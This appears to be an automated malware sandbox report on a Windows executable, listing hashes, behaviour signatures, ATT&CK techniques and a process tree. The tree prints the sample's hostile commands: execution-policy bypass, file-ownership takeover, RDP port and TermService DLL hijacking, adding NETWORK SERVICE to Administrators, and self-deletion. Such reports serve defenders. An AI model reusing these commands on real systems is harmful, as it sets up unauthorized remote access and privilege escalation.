Analysis

  • max time kernel
    36s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-11-2020 15:58

General

  • Target

    25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe

  • Size

    3.8MB

  • MD5

    ddf329f7573b2a7dcdf11e8734a44850

  • SHA1

    cbf1ea887d769a1f094b197c000dda8426d3f7f6

  • SHA256

    25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591

  • SHA512

    f5301d9f2ee4a7d31f712ef1cc433f72bcd01033872d1e29dfbdcc6fc10d873b3c36c8630989b944cc45cd39829b10697f23db0cb0aceeda12932b5889d639f8

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • Deletes itself 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 116 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe
    "C:\Users\Admin\AppData\Local\Temp\25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • \??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\no3fweob\no3fweob.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F82.tmp" "c:\Users\Admin\AppData\Local\Temp\no3fweob\CSC7452785A96204562BD9D8A4511E896B.TMP"
          4⤵
            PID:1612
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1760
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1624
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Windows\SysWOW64\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1144
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1696
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1892
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:336
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1516
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1752
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1692
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1932
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:332
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1788
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1972
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
                PID:272
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  4⤵
                    PID:1624
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  3⤵
                    PID:1092
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start rdpdr
                      4⤵
                        PID:1532
                        • C:\Windows\SysWOW64\net.exe
                          net start rdpdr
                          5⤵
                            PID:1676
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 start rdpdr
                              6⤵
                                PID:1948
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                          3⤵
                            PID:336
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net start TermService
                              4⤵
                                PID:652
                                • C:\Windows\SysWOW64\net.exe
                                  net start TermService
                                  5⤵
                                    PID:1736
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 start TermService
                                      6⤵
                                        PID:1752
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                  3⤵
                                    PID:640
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                    3⤵
                                      PID:1812

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                Account Manipulation

                                1
                                T1098

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Modify Existing Service

                                1
                                T1031

                                Defense Evasion

                                Modify Registry

                                3
                                T1112

                                File Permissions Modification

                                1
                                T1222

                                Lateral Movement

                                Remote Desktop Protocol

                                1
                                T1076

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c
                                  MD5

                                  b6d38f250ccc9003dd70efd3b778117f

                                  SHA1

                                  d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                                  SHA256

                                  4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                                  SHA512

                                  67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3ebd640f-b439-43ed-9461-72d684cc0f20
                                  MD5

                                  7f79b990cb5ed648f9e583fe35527aa7

                                  SHA1

                                  71b177b48c8bd745ef02c2affad79ca222da7c33

                                  SHA256

                                  080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                  SHA512

                                  20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8
                                  MD5

                                  df44874327d79bd75e4264cb8dc01811

                                  SHA1

                                  1396b06debed65ea93c24998d244edebd3c0209d

                                  SHA256

                                  55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                                  SHA512

                                  95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422
                                  MD5

                                  be4d72095faf84233ac17b94744f7084

                                  SHA1

                                  cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                                  SHA256

                                  b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                                  SHA512

                                  43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf
                                  MD5

                                  75a8da7754349b38d64c87c938545b1b

                                  SHA1

                                  5c28c257d51f1c1587e29164cc03ea880c21b417

                                  SHA256

                                  bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                                  SHA512

                                  798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_68be566e-8e8e-4edb-90bf-f0b076b80554
                                  MD5

                                  d89968acfbd0cd60b51df04860d99896

                                  SHA1

                                  b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                  SHA256

                                  1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                  SHA512

                                  b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6
                                  MD5

                                  5e3c7184a75d42dda1a83606a45001d8

                                  SHA1

                                  94ca15637721d88f30eb4b6220b805c5be0360ed

                                  SHA256

                                  8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                                  SHA512

                                  fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a
                                  MD5

                                  a725bb9fafcf91f3c6b7861a2bde6db2

                                  SHA1

                                  8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                  SHA256

                                  51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                  SHA512

                                  1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aa02e892-f3fb-47d9-bce5-b86e24b2057b
                                  MD5

                                  354b8209f647a42e2ce36d8cf326cc92

                                  SHA1

                                  98c3117f797df69935f8b09fc9e95accfe3d8346

                                  SHA256

                                  feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

                                  SHA512

                                  420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aacd219d-c7ba-43ff-a67c-9ddc2f632d63
                                  MD5

                                  597009ea0430a463753e0f5b1d1a249e

                                  SHA1

                                  4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                                  SHA256

                                  3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                                  SHA512

                                  5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da10239e-4db8-428e-8c34-ca9ea2e7c239
                                  MD5

                                  a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                  SHA1

                                  81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                  SHA256

                                  dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                  SHA512

                                  8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134
                                  MD5

                                  02ff38ac870de39782aeee04d7b48231

                                  SHA1

                                  0390d39fa216c9b0ecdb38238304e518fb2b5095

                                  SHA256

                                  fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                                  SHA512

                                  24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                  MD5

                                  426c7140c9b787aa2670c86e151b4da1

                                  SHA1

                                  4fb5c057b79d4f4081c4b018f788989d2def4cec

                                  SHA256

                                  2814f710c61ab545ad22edcfa7a4d6cc02b80e039d43820671e57f3090ddb39c

                                  SHA512

                                  37c8274b86a5019fe915bcbd1245a26228205199f56dce4b3c28e255ef1fd1f6e045003278032efc513f6fe31f5e94b082b1237e974843c3a96a06cc7979b040

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                  MD5

                                  c4cbbafb3057efb80f5b806f3c9f529d

                                  SHA1

                                  116f96527564199f823278a0592f5378371eb2b2

                                  SHA256

                                  7bd1e0e6d8551caeecb3ee60745f9d71e0e894e5f2f0e4430fdb7c85920c0535

                                  SHA512

                                  0276537008d9e5a68e258edd2a878fbf95cf2ec5fed9a461e7ec6963d2a3657a7a3ea6a74097ae519427ba9dc8da82436fecf2804f8239f92a4db3dfa6eea963

                                • C:\Users\Admin\AppData\Local\Temp\RES1F82.tmp
                                  MD5

                                  cd22affe73372288fc6ac1ea9a5d1ac4

                                  SHA1

                                  5fb6da6e007f40bddb8cc42d53045c079277cec2

                                  SHA256

                                  3e682ee8fde148bdcd959085458283a394d25b338fb2208c04c2fb1e10e4f00b

                                  SHA512

                                  36ea98076d2e179444f466a9dd2cda09c1016ef8c030b7f5ef36f2daa9a82fe1df08c9b6d28dc92f6d105d47418b6857eab428e719ba0242ccef61a38ab85f8a

                                • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                  MD5

                                  851bf8df96899b2cc50af8047e9fbe5c

                                  SHA1

                                  e259d3ea9eabae926f74358b6e8f583cfcb4106b

                                  SHA256

                                  b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6

                                  SHA512

                                  648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792

                                • C:\Users\Admin\AppData\Local\Temp\no3fweob\no3fweob.dll
                                  MD5

                                  520ae897360aa250c63cdad36ab6c8f8

                                  SHA1

                                  9f5ec2cb99bbc2d37fce75e9a7e9287e83239a11

                                  SHA256

                                  498f784d902d51b158b628608e4231fc72a847ab2b166c52e0c7a80772a1b3b6

                                  SHA512

                                  01f17ee71920f9d133aea0eb585cb842dda45cbdd6f87844af32e506ce79e27bd54ba899b025d2835d7735f86bdedc9cbc75931a3321ad906f5f2ac9bc5b1435

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  1ea5a411ae2b41e744a874d6406310a2

                                  SHA1

                                  af9ba79db5ca8ba89b172783ccee6ecc53abc134

                                  SHA256

                                  c7e03b144a6d3b37dd6cfa6815ec543c513f91d4f5c2d0219ebeb66ddcbebce3

                                  SHA512

                                  40a88c494a3f101250c1f155ad537c6fe87fbe8ebefe6e8d72863d44349b283c477f8ba196849b2c14ee9d52d382c63c5a5b4ab293c3fb001c8d69ce3e8f1d7d

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  1ea5a411ae2b41e744a874d6406310a2

                                  SHA1

                                  af9ba79db5ca8ba89b172783ccee6ecc53abc134

                                  SHA256

                                  c7e03b144a6d3b37dd6cfa6815ec543c513f91d4f5c2d0219ebeb66ddcbebce3

                                  SHA512

                                  40a88c494a3f101250c1f155ad537c6fe87fbe8ebefe6e8d72863d44349b283c477f8ba196849b2c14ee9d52d382c63c5a5b4ab293c3fb001c8d69ce3e8f1d7d

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  1ea5a411ae2b41e744a874d6406310a2

                                  SHA1

                                  af9ba79db5ca8ba89b172783ccee6ecc53abc134

                                  SHA256

                                  c7e03b144a6d3b37dd6cfa6815ec543c513f91d4f5c2d0219ebeb66ddcbebce3

                                  SHA512

                                  40a88c494a3f101250c1f155ad537c6fe87fbe8ebefe6e8d72863d44349b283c477f8ba196849b2c14ee9d52d382c63c5a5b4ab293c3fb001c8d69ce3e8f1d7d

                                • C:\Windows\SysWOW64\rfxvmt.dll
                                  MD5

                                  dc39d23e4c0e681fad7a3e1342a2843c

                                  SHA1

                                  58fd7d50c2dca464a128f5e0435d6f0515e62073

                                  SHA256

                                  6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                  SHA512

                                  5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                • \??\PIPE\lsarpc
                                  MD5

                                  d41d8cd98f00b204e9800998ecf8427e

                                  SHA1

                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                  SHA256

                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                  SHA512

                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                • \??\PIPE\lsarpc
                                  MD5

                                  d41d8cd98f00b204e9800998ecf8427e

                                  SHA1

                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                  SHA256

                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                  SHA512

                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                • \??\c:\Users\Admin\AppData\Local\Temp\no3fweob\CSC7452785A96204562BD9D8A4511E896B.TMP
                                  MD5

                                  404beb066615f61eea0792aeeeafb191

                                  SHA1

                                  6305137312d1d5612660ddee97ae0ae6c460ce22

                                  SHA256

                                  a3ef444e742f0d5146c13ef7691acb65a98fde6c88de7385e39b80b99579b852

                                  SHA512

                                  284b4d04cf5ad2ea7bcbc064be5470c935c5a3896e0ff3507710b29226db5e97f35fecf27f5f599950e1f8b686b8968c7cc5188fcfec60ac7e65aeb9ce873454

                                • \??\c:\Users\Admin\AppData\Local\Temp\no3fweob\no3fweob.0.cs
                                  MD5

                                  6f235215132cdebacd0f793fe970d0e3

                                  SHA1

                                  2841e44c387ed3b6f293611992f1508fe9b55b89

                                  SHA256

                                  ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                  SHA512

                                  a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                • \??\c:\Users\Admin\AppData\Local\Temp\no3fweob\no3fweob.cmdline
                                  MD5

                                  ad77c07c7046ce1bd0db728ee54aaf05

                                  SHA1

                                  6658ae153b7db2d6faba1cd2ff04ab5d1006f39f

                                  SHA256

                                  b68ea9076a50efbe2417161f6a53123b6e63672a150dddd676aa4f020c6cda0d

                                  SHA512

                                  2c87886d08a0dcff67ed34a623e966f2b10a56ab0b6fcd75c5e12bf154f9a7a1323a20bc9d8a40a207551a1a450ee74bc2e18446935b20e9db68f3768655db28

                                • memory/272-128-0x0000000000000000-mapping.dmp
                                • memory/332-120-0x0000000000000000-mapping.dmp
                                • memory/336-109-0x0000000000000000-mapping.dmp
                                • memory/336-137-0x0000000000000000-mapping.dmp
                                • memory/640-142-0x0000000000000000-mapping.dmp
                                • memory/652-138-0x0000000000000000-mapping.dmp
                                • memory/1092-132-0x0000000000000000-mapping.dmp
                                • memory/1144-102-0x0000000000000000-mapping.dmp
                                • memory/1516-111-0x0000000000000000-mapping.dmp
                                • memory/1532-133-0x0000000000000000-mapping.dmp
                                • memory/1612-27-0x0000000000000000-mapping.dmp
                                • memory/1624-82-0x0000000005570000-0x0000000005571000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1624-129-0x0000000000000000-mapping.dmp
                                • memory/1624-71-0x0000000000000000-mapping.dmp
                                • memory/1624-73-0x0000000073920000-0x000000007400E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1624-77-0x0000000005470000-0x0000000005471000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1624-81-0x0000000005520000-0x0000000005521000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1676-24-0x0000000000000000-mapping.dmp
                                • memory/1676-134-0x0000000000000000-mapping.dmp
                                • memory/1692-115-0x0000000000000000-mapping.dmp
                                • memory/1696-105-0x0000000000000000-mapping.dmp
                                • memory/1736-139-0x0000000000000000-mapping.dmp
                                • memory/1752-113-0x0000000000000000-mapping.dmp
                                • memory/1752-140-0x0000000000000000-mapping.dmp
                                • memory/1760-35-0x0000000073920000-0x000000007400E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1760-70-0x0000000005F00000-0x0000000005F01000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1760-69-0x0000000005EF0000-0x0000000005EF1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1760-44-0x00000000053E0000-0x00000000053E1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1760-43-0x0000000005650000-0x0000000005651000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1760-39-0x0000000005370000-0x0000000005371000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1760-33-0x0000000000000000-mapping.dmp
                                • memory/1788-123-0x0000000000000000-mapping.dmp
                                • memory/1800-88-0x0000000000000000-mapping.dmp
                                • memory/1800-90-0x0000000073920000-0x000000007400E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1812-144-0x0000000000000000-mapping.dmp
                                • memory/1892-107-0x0000000000000000-mapping.dmp
                                • memory/1932-117-0x0000000000000000-mapping.dmp
                                • memory/1948-135-0x0000000000000000-mapping.dmp
                                • memory/1972-126-0x0000000000000000-mapping.dmp
                                • memory/1988-15-0x0000000005830000-0x0000000005831000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-119-0x00000000068B0000-0x00000000068C0000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/1988-122-0x00000000068B0000-0x00000000068C0000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/1988-23-0x0000000007370000-0x0000000007371000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-22-0x00000000072B0000-0x00000000072B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-31-0x0000000007340000-0x0000000007341000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-14-0x0000000005740000-0x0000000005741000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-9-0x0000000005670000-0x0000000005671000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-5-0x0000000005240000-0x0000000005241000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-125-0x00000000068B0000-0x00000000068C0000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/1988-4-0x00000000024D0000-0x00000000024D1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-3-0x0000000004780000-0x0000000004781000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-2-0x00000000005E0000-0x00000000005E1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-32-0x00000000054B0000-0x00000000054B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1988-1-0x0000000073920000-0x000000007400E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1988-0-0x0000000000000000-mapping.dmp
                                • memory/1988-145-0x00000000058E0000-0x00000000058F0000-memory.dmp
                                  Filesize

                                  64KB